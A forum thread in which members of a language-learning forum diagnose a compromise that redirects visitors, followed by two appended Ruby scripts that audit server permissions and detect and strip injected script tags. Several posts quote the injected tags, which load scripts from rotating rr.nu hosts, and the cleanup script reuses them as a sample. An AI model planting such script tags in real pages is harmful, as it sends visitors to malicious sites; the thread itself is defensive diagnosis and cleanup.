Site Hacked? Need a hand?

Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Site Hacked? Need a hand?

Post by Chris Corbyn »

One for the admins: I'm being redirected to a handful of different "spam" (and potentially damaging) websites when opening the forum. It appears somebody has hacked the code base of the forum to do this. Some shared web hosts do not have strong enough security policies, making it possible for other users on the same server to actually edit your own website... I'm not sure which web host you're with, but it seems that either this is what's happened, or somebody has been able to take advantage of an exploit in the new phpBB software and inject some JS into one of the pages. I'm at work right now, but will take a closer look "from the outside" when I get a free moment.

If you need somebody to look at and fix it, let me know. I'm a full-time PHP and Ruby developer by profession.

Also, if you would like to get off shared hosting, I would be happy to set you guys up on a VPS (a virtual machine, where you have full control of the server, without other users). I doubt the forum uses too much traffic ;)
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

This has been injected into your templates:

Code:

<script src="http://astre09atyqr.rr.nu/nl.php?p=d"></script>
</body>
</html><script src="http://ouvech35oicetim.rr.nu/nl.php?p=d"></script>

If you "View Source" in your browser and scroll to the very last lines of HTML, you'll see this. It is malicious and needs removing. It is currently giving a 404 error, so not doing much harm, but earlier it was redirecting your users to some other site. I never waited long enough for the page to load to know what the other site was, but it was either a .ru or a .nu domain.

This is almost certainly a hack on the server itself, not an exploit by a user posting on the forum, due to the placement of the JavaScript in the template.
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

On a closer look, the domains change each time you refresh, so presumably some are working, and some are 404'ing.
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

Thanks for this, Chris. Calum is aware of the problem and has done quite a lot of work already to try to correct it. He's away for a few days' holiday and will continue when he returns. I am not sure if there is anything you can do to help, but I would suggest that you PM him. :) I would love to get my hands on the scumbag(s) that do this sort of thing - such tiny minds! :evil:
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Yeah, it winds me up people doing stuff like this. They're probably trying to drive traffic to their dodgy website in order to get it ranking higher in Google. There might be a simple fix on the permissions of the home directory on the server too. There are two mistakes commonly made:

1. Web servers usually run Apache. If all user accounts serve web pages under the same Apache user, it's easy for other users to modify content that is writable to the website itself.
2. Web servers run Linux. Linux is secure even with multiple users on the same server, if set up correctly. One part of "correctly" setting up the server is to make sure only the owner of a particular user account can change into that user's home directory/folder, let alone write to it. Slack permissions make it very easy for casual hackers to make changes.

Glad Calum is aware of it and looking into it. Hit me up if you need any guidance :)
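
An added example, not part of the original post and not the forum's own tooling: a Ruby check for the two permission mistakes listed above, reporting a home directory that other accounts can enter and files that group or other can write. The account name, file names and the strict owner-only rule for the home directory are assumptions taken from the wording of the post.

```ruby
require "find"
require "fileutils"
require "tmpdir"

# Returns [path, problem] pairs for one account's home directory.
def audit_home(home)
  issues = []
  # Strict reading of the post: nobody but the owner may list or enter it.
  issues << [home, :home_open_to_others] if (File.stat(home).mode & 0o005) != 0
  Find.find(home) do |path|
    st = File.lstat(path)
    next if st.symlink? # a symlink's own mode bits mean nothing
    if (st.mode & 0o002) != 0
      issues << [path, :world_writable]
    elsif (st.mode & 0o020) != 0
      issues << [path, :group_writable]
    end
  end
  issues
end

# Constructed sample tree (hypothetical names): a home directory others can
# enter, holding one template that any account on the server may overwrite.
def build_sample(dir)
  home = File.join(dir, "forumuser")
  tpl  = File.join(home, "public_html", "footer.html")
  FileUtils.mkdir_p(File.dirname(tpl))
  File.write(tpl, "</body>\n</html>\n")
  File.chmod(0o755, home)
  File.chmod(0o755, File.dirname(tpl))
  File.chmod(0o666, tpl)
  home
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    audit_home(build_sample(dir)).each { |path, why| puts "#{why}: #{path}" }
  end
end
```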
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Same thing Chris. I often am redirected to another internet page when opening the forum page.
I've already told Calum about this. I scanned my computer for any malware, virus, trojan etc. etc., but it's totally clean.
However, whoever is noticing this, please write in this thread.

How can I fix it Chris?

Thanks
Italians don't know what Caesar salad is !!
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

-Luca- wrote: How can I fix it Chris?
You can't really fix it from your side very easily. The easiest way to get around it would be to turn JavaScript off in your web browser, but I wouldn't advise it, since many websites depend on it (including small parts of this site, such as the BBCode buttons to bold your text etc). If you're willing to run a separate web browser just to access the forum, then this may be a viable option. In Chrome and Firefox, it is found in the Advanced settings. I have Chrome open right now, and it's under "Content Settings".

You can also block the domains (either by firewall, or by editing your hosts file, which requires some technical expertise) that the JavaScript is loading, but there seem to be a number of them and I can't get the full list without access to the server, unfortunately, so this sort of goes out of the window for now. I think we'll just have to wait for Calum to return :)
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Thanks Chris :)

I could open the forum page using firefox....we'll see... thanks again
Italians don't know what Caesar salad is !!
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

Touch wood I have yet to experience any problems on my desktop using Chrome (so much better than IE!!!) but it's the Macbook, running Safari, on which the problem surfaces. And Safari is supposed to be more robust..... mmm.. I don't think so!! :)
Quintus
Posts: 421
Joined: Thu Jun 30, 2011 8:22 am
Location: Florence, Italy

Re: Site Hacked? Need a hand?

Post by Quintus »

-Luca- wrote: I scanned my computer for any malware, virus, trojan etc. etc., but it's totally clean. However, whoever is noticing this, please write in this thread.
Hi Luca,

Here is some more information about what happens on my end. I have Firefox, Opera and, of course, IE installed on XP. I currently run Opera and am not redirected elsewhere when opening impariamo.com. Everything is ok with Firefox as well. Oddly enough: both Opera and Firefox don't show any extraneous line outside of the <html>...</html> tags. I have the "Enable Javascripts" checkbox enabled both in Opera and Firefox. It looks like these browsers filter irregular/illegal scripts out of the source code and possibly display a cleansed version of it.

Instead, with MSIE (Ver. 7.0.5730.11), everything happens just as Chris said. The first time I tried, the homepage of impariamo.com was shown, but then the browser was redirected to another site. Though I couldn't see anything of it because the operating system issued a GPF (General Protection Fault) before the screen was refreshed, and so the browser crashed.

The second time I stopped the browser just before the forum homepage was completely drawn, just trying to avoid being redirected. I found at the end of the html code:

<script src="http://asin54grepl.rr.nu/nl.php?p=d"></script>
</body>
</html><script src="http://ily23visi.rr.nu/nl.php?p=d"></script>

From the third time on (each time either closing IE and then re-opening it or not), the browser wasn't redirected, but the extraneous lines were still there.

The explanation? Who knows! :D I've been on the Internet with Opera for years without even having an antivirus installed. Either I'm shamelessly lucky or the browser deserves some of the credit too. It seems to me that this browser works quite hard against scripts and frauds. But in my opinion the truth is that any browser is so much better than IE, as Peter said.

Bye,
Franco

--
P.S.
Peter, "touch wood", here's another one of the same kind as "I can see for miles"! We say "tocchiamo ferro", "touch iron"! :D
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

"Touch iron" eh! Not when it's freezing cold I wouldn't!!! :lol:

I have to say there are some strange things happening. I cannot access my PMs, at least not the latest one that Joe sent, although on clicking on Previous Message I was able to read that one. Also, there is something odd in the Moderator Control Panel; I have sent Calum an email with a screen print to let him know. There are one or two other things as well. Can others trawl round the site and post any problems they encounter? Thanks. :)
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Hi Quintus, yes, the address you posted is one of those I get redirected to.
It hasn't happened since yesterday... who knows, touch iron... or... as we would do here in Italy... a little scratch of the... ahem... the twins... :D

Peter, what's wrong with the Moderator Control Panel?
Italians don't know what Caesar salad is !!
calum
Posts: 391
Joined: Sun Oct 29, 2006 8:46 pm
Location: Scozia

Re: Site Hacked? Need a hand?

Post by calum »

Chris Corbyn wrote: If you need somebody to look at and fix it, let me know. I'm a full-time PHP and Ruby developer by profession.
Hi Chris,

thank you for your very kind offer. I have emailed you privately regarding the current forum problem.
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Thanks, Calum!
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Things should be better now, and if it happens again—before I take a closer look at where the source of the issue is tomorrow—I have written a little Ruby script to clean up the mess in under 30 seconds.

See you tomorrow! :)
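
An added example, not Chris's script and not code from the forum: a Ruby check for the kind of injection quoted earlier in the thread, which also strips what it flags. Because the thread notes that the domains change on every refresh, it matches on structure (a script tag after the closing html tag, or an external script host outside an allowlist) instead of a domain list; the allowlist, the sample page and the `/styles/forum.js` path are assumptions.

```ruby
require "uri"

# Assumption: hosts this site legitimately loads external scripts from.
ALLOWED_SCRIPT_HOSTS = ["forum.example"].freeze
SCRIPT_TAG = %r{<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>\s*</script>}i

# Returns [src, reason] pairs for every script tag that looks injected.
def suspicious_scripts(html, allowed = ALLOWED_SCRIPT_HOSTS)
  end_of_doc = html =~ %r{</html\s*>}i
  found = []
  html.scan(SCRIPT_TAG) do
    m = Regexp.last_match
    host = begin
      URI.parse(m[1]).host
    rescue URI::InvalidURIError
      nil
    end
    if end_of_doc && m.begin(0) > end_of_doc
      found << [m[1], :after_closing_html]   # nothing belongs after </html>
    elsif host && !allowed.include?(host.downcase)
      found << [m[1], :host_not_allowed]     # relative URLs have no host
    end
  end
  found
end

# Removes the flagged tags and returns the cleaned markup.
def strip_suspicious(html, allowed = ALLOWED_SCRIPT_HOSTS)
  bad = suspicious_scripts(html, allowed).map(&:first)
  html.gsub(SCRIPT_TAG) { |tag| bad.include?(tag[SCRIPT_TAG, 1]) ? "" : tag }
end

# Constructed sample page; the two rr.nu tags are the ones quoted in the thread.
SAMPLE = <<~HTML
  <html><body>
  <script src="/styles/forum.js"></script>
  <script src="http://astre09atyqr.rr.nu/nl.php?p=d"></script>
  </body>
  </html><script src="http://ouvech35oicetim.rr.nu/nl.php?p=d"></script>
HTML

if __FILE__ == $PROGRAM_NAME
  suspicious_scripts(SAMPLE).each { |src, why| puts "#{why}: #{src}" }
end
```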